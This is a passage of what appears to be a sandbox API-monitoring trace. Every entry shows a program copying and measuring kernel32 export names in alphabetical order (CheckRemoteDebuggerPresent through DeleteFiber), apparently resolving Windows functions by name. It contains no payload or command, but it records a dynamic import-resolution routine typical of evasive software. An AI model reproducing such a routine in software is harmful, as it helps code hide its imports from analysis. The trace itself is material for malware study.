lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0049.707] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0049.707] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0049.707] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0049.707] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0049.707] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0049.707] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0049.707] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0049.707] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0049.707] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0049.707] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0049.707] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0049.707] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0049.707] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0049.707] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0049.707] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0049.708] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0049.708] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0049.708] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0049.708] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0049.708] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0049.708] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0049.708] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0049.708] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0049.708] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0049.708] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0049.708] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0049.708] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0049.708] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0049.708] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0049.708] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0049.708] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0049.708] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0049.708] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0049.708] lstrcpyA (in: lpString1=0x341f148, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0049.708] lstrlenA (lpString="COPYCONTEXT") returned 11 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0049.709] lstrlenA (lpString="COPYFILEA") returned 9 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0049.709] lstrlenA (lpString="COPYFILEEXA") returned 11 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0049.709] lstrlenA (lpString="COPYFILEEXW") returned 11 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0049.709] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0049.709] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0049.709] lstrlenA (lpString="COPYFILEW") returned 9 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0049.709] lstrlenA (lpString="COPYLZFILE") returned 10 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0049.709] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0049.709] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0049.709] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0049.709] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0049.709] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0049.709] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0049.709] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0049.709] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0049.709] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0049.709] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0049.709] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0049.709] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0049.709] lstrlenA (lpString="CREATEEVENTA") returned 12 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0049.710] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0049.710] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0049.710] lstrlenA (lpString="CREATEEVENTW") returned 12 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0049.710] lstrlenA (lpString="CREATEFIBER") returned 11 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0049.710] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0049.710] lstrlenA (lpString="CREATEFILEA") returned 11 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0049.710] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0049.710] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0049.710] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0049.710] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0049.710] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0049.710] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0049.710] lstrlenA (lpString="CREATEFILEW") returned 11 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0049.710] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0049.710] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0049.710] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0049.710] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0049.710] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0049.710] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0049.710] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0049.711] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0049.711] lstrlenA (lpString="CREATEJOBSET") returned 12 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0049.711] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0049.711] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0049.711] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0049.711] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0049.711] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0049.711] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0049.711] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0049.711] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0049.711] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0049.711] lstrlenA (lpString="CREATEPIPE") returned 10 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0049.711] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0049.711] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0049.711] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0049.711] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0049.711] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0049.711] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0049.711] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0049.711] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0049.712] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0049.712] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0049.712] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0049.712] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0049.712] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0049.712] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0049.712] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0049.712] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0049.712] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0049.712] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0049.712] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0049.712] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0049.712] lstrlenA (lpString="CREATETHREAD") returned 12 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0049.712] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0049.712] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0049.712] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0049.712] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0049.712] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0049.712] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0049.712] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0049.713] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0049.713] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0049.713] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0049.713] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0049.713] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0049.713] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0049.713] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0049.713] lstrlenA (lpString="CTRLROUTINE") returned 11 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0049.713] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0049.713] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0049.713] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0049.713] lstrlenA (lpString="DEBUGBREAK") returned 10 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0049.713] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0049.713] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0049.713] lstrlenA (lpString="DECODEPOINTER") returned 13 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0049.713] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0049.713] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0049.713] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0049.713] lstrcpyA (in: lpString1=0x341f148, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0049.713] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0049.714] lstrlenA (lpString="DELETEATOM") returned 10 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0049.714] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0049.714] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0049.714] lstrcpyA (in: lpString1=0x341f148, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0049.714] lstrlenA (lpString="DELETEFIBER") returned 11 [0049.714] lstrcpyA (in: 